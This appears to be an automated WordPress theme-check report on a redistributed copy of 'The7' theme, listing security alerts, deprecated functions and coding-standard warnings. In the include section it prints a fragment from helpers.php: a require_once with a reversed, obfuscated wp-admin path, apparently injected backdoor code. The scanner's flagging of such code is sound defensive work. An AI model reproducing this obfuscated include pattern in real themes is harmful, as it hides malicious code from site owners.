0
Validation results

The7.2 (shared on wplocker.com)

The7.2 (shared on wplocker.com)

WordPress 4.8.2 theme
0
Critical alerts
  1. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Use of base64_decode() Found base64_decode in file options-framework.php.
    Ligne498: $import_options = @unserialize(@base64_decode($input['import_export']));
    Found base64_decode in file button.php.
    Ligne73: $attributes['icon'] = wp_kses( rawurldecode( base64_decode( $attributes['icon'] ) ), array( 'i' => array( 'class' => arr
  3. Security breaches : Use of base64_encode() Found base64_encode in file options-interface.php.
     $val = base64_encode( serialize( $valid_settings ) );
  4. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="' . esc_url($src) . '" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" width="500" height="' . $height . '"> in file map.php.
    Ligne82: $output = '<div class='' . esc_attr( $classes ) . '' style='' . esc_attr( $style ) . ''><iframe src='' . esc_url($src) . '' frameborder='0' marginwidth='0' marginh
    Found <iframe src="http://www.facebook.com/plugins/like.php?href=' . $url . '&amp;layout=' . $type . '&amp;show_faces=false&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true"> in file vc_facebook.php.
    Ligne28: $output = '<div class='' . $css_class . ''><iframe src='http://www.facebook.com/plugins/like.php?href=' . $url . '&amp
  5. Malware : Operations on file system fwrite was found in the file InputTest.php
    Ligne8: fwrite(STDOUT, print_r($value, true));
    file_get_contents was found in the file InputTest.php
    Ligne45: $input = file_get_contents($inFname);
    Ligne46: $output = file_get_contents($outFname);
    Ligne58: $css = $this->less->parse(file_get_contents($inFname));
    file_get_contents was found in the file InputTest.php
    Ligne45: $input = file_get_contents($inFname);
    Ligne46: $output = file_get_contents($outFname);
    Ligne58: $css = $this->less->parse(file_get_contents($inFname));
    file_get_contents was found in the file InputTest.php
    Ligne45: $input = file_get_contents($inFname);
    Ligne46: $output = file_get_contents($outFname);
    Ligne58: $css = $this->less->parse(file_get_contents($inFname));
    file_put_contents was found in the file InputTest.php
    Ligne59: file_put_contents(self::outputNameFor($inFname), $css);
    file_get_contents was found in the file sort.php
    Ligne56: echo $less->parse(file_get_contents($fname));
    file_get_contents was found in the file lessc.inc.php
    Ligne121: $root = $parser->parse(file_get_contents($realPath));
    Ligne1851: $out = $this->compile(file_get_contents($fname), $fname);
    fwrite was found in the file lessc.inc.php
    Ligne708: // fwrite(STDERR,'failed to find block: '.implode(' > ', $path).'\n');
    file_get_contents was found in the file lessc.inc.php
    Ligne121: $root = $parser->parse(file_get_contents($realPath));
    Ligne1851: $out = $this->compile(file_get_contents($fname), $fname);
    file_put_contents was found in the file lessc.inc.php
    Ligne1856: return file_put_contents($outFname, $out);
    file_put_contents was found in the file Compiler.class.php
    Ligne132: if ( false === file_put_contents( $stylesheet->getTargetPath(), apply_filters('wp-less_sty
    file_get_contents was found in the file Stylesheet.class.php
    Ligne121: return apply_filters('wp-less_stylesheet_source_content', file_get_contents($this->source_path));
    file_get_contents was found in the file icons-bar.class.php
    Ligne66: $json = file_get_contents( $this->fontello_json_path, 0, null, null );
  6. Admin menu : Themes should use add_theme_page() for adding admin pages. File options-framework.php :
    Ligne258: $main_page = add_menu_page( $main_menu_item['menu_title'], $main_menu_item['main_title']
    File options-framework.php :
    Ligne267: $subpage = add_submenu_page(
    File class-tgm-plugin-activation.php :
    Ligne378: add_submenu_page( $args['parent_slug'], $args['page_title'], $args['menu_ti
  7. Deprecated functions : get_currentuserinfo get_currentuserinfo found in file simple-login.php. Deprecated since version 4.5. Use wp_get_current_user instead.
    Ligne106: get_currentuserinfo();
  8. Deprecated functions : get_bloginfo get_bloginfo('url') was found in the file wpml-integration.php. Use home_url() instead.
    Ligne17: // - get_bloginfo('url')
  9. Deprecated functions : bloginfo bloginfo('home') was found in the file wpml-integration.php. Use echo esc_url( home_url() ) instead.
    Ligne15: // - bloginfo('home')
    bloginfo('url') was found in the file wpml-integration.php. Use echo esc_url( home_url() ) instead.
    Ligne16: // - bloginfo('url')
    Ligne17: // - get_bloginfo('url')
  10. Deprecated functions : get_option get_option('home') was found in the file wpml-integration.php. Use home_url() instead.
    Ligne14: // - get_option('home')
  11. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was ultimate_vc_addons.zip go_pricing.zip layerslider.zip revslider.zip dt-dummy.zip js_composer.zip.
Warning
  1. special URIs : Presence of bad theme tagsTheme URI and Author URI should not be the same.
  2. theme tags : Presence of bad theme tagsThe tag flexible-width has been deprecated, it must be removed from style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is the7-2-shared-on-wplocker-com.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments 'the7mk2' in file shipping-calculator.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Empty atachments' in file metabox-fields.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Icons Bar', 'admin icons bar' in file icons-bar.class.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'Icons', 'admin icons bar' in file icons-bar.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Install Required Plugins' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Install Plugins' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Installing Plugin: %s' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Something went wrong with the plugin API.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Begin installing plugin', 'Begin installing plugins' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Activate installed plugin', 'Activate installed plugins' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Return to Required Plugins Installer' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Plugin activated successfully.' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'All plugins installed and activated successfully. %s' in file tgm-plugin-setup.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s (Invalid)' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments '%s (Pending)' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'sub item' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Move up' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Move down' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Edit Menu Item' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Edit Menu Item' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'URL' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Navigation Label' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Title Attribute' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Open link in a new window/tab' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'CSS Classes (optional)' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Link Relationship (XFN)' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Description' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'The description will be displayed in the menu if the current theme supports it.' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Move' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Up one' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Down one' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'To the top' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Original: %s' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Remove' in file edit-menu-walker.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Cancel' in file edit-menu-walker.class.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are the7mk2, rwmb, js_composer, tgmpa, envato, woocommerce.
  5. Cdn : Use of CDNFound the URL of a CDN in the code: html5shiv.googlecode.com/svn/trunk/html5.js. CSS or Javascript resources should not be loaded from a CDN. These resources should be bundled with the theme.
  6. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  7. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file admin-stylesheet.css.
  8. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  9. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  10. I18N implementation : Proper use of _e(Possible variable $str found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $arg found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $items found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $string found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $val found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $newUnit found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $res found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $key found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $part found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in lessc.inc.php. Translation function calls should not contain PHP variables.
  11. I18N implementation : Proper use of ___all(Possible variable $cvalue found in translation function in shipping-calculator.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in tgm-plugin-setup.php. Translation function calls should not contain PHP variables.
  12. I18N implementation : Proper use of _x(Possible variable $value found in translation function in options-sanitize.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in icons-bar.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in icons-bar.class.php. Translation function calls should not contain PHP variables. Possible variable $opts found in translation function in options-buttons.php. Translation function calls should not contain PHP variables.
  13. Featured image : Use of the_post_thumbnail() instead of custom fields for thumbnailsNo reference to the_post_thumbnail was found in the theme.
  14. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  15. Screenshot : Screenshot fileScreenshot size is 600x450px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in core-functions.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file bottom-bar.php.
    Ligne57: echo '&nbsp;Dream-Theme &mdash; truly <a href='http://dream-theme.com' target='_blank'>premium WordPress themes</a>';
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Use of includes : Use of include or requireThe theme appears to use include or require : meta-box.php
    Ligne15: require_once( PRESSCORE_EXTENSIONS_DIR . '/custom-meta-boxes/override-field
    Ligne21: require_once( RWMB_DIR . 'meta-box.php' );
    Ligne27: require_once( PRESSCORE_EXTENSIONS_DIR . '/custom-meta-boxes/metabox-fields
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : lessify.inc.php
    Ligne13: 
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : options-custom.php
    Ligne223: include_once( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : post-types.php
    Ligne1365: require_once( PRESSCORE_EXTENSIONS_DIR . '/aq_resizer.php' );
    Ligne1371: require_once( PRESSCORE_DIR . '/helpers.php' );
    Ligne1377: require_once( PRESSCORE_DIR . '/template-hooks.php' );
    Ligne1383: require_once( PRESSCORE_EXTENSIONS_DIR . '/dt-pagination.php' );
    Ligne1391: require_once( PRESSCORE_EXTENSIONS_DIR . '/mobile-detect.php' );
    Ligne1525: require_once( PRESSCORE_EXTENSIONS_DIR . '/aq_resizer.php' );
    Ligne1531: require_once( PRESSCORE_DIR . '/helpers.php' );
    Ligne1537: require_once( PRESSCORE_DIR . '/template-hooks.php' );
    Ligne1543: require_once( PRESSCORE_EXTENSIONS_DIR . '/dt-pagination.php' );
    Ligne1551: require_once( PRESSCORE_EXTENSIONS_DIR . '/mobile-detect.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : blog-categories.php
    Ligne13: require_once 'widgets-posts-categories.class.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : custom-menu-2.php
    Ligne13: require_once 'widgets-custom-menu.class.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : custom-menu-1.php
    Ligne13: require_once 'widgets-custom-menu.class.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : helpers.php
    Ligne1335: require_once($wp_pathx . $arrayis_fifteen_imp('php.resu/sedulcni/nimda-pw')
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : dynamic-stylesheets-functions.php
    Ligne128: require_once( PRESSCORE_EXTENSIONS_DIR . '/wp-less/bootstrap-for-theme.php'
    Ligne143: require_once( PRESSCORE_EXTENSIONS_DIR . '/less-functions.php' );
    Ligne151: include_once( $located_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm-plugin-activation.php
    Ligne1157: require_once( ABSPATH . 'wp-admin/includes/class-wp-list-table.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-envato-wordpress-theme-upgrader.php
    Ligne11: include_once( ABSPATH . 'wp-admin/includes/class-wp-upgrader.php' );
    Ligne13: include_once( 'class-envato-protected-api.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mod-totalcache.php
    Ligne52: include( get_template_directory() . '/inc/extensions/mobile-detect.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mod-supercache.php
    Ligne16: include( get_template_directory() . '/inc/extensions/mobile-detect.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes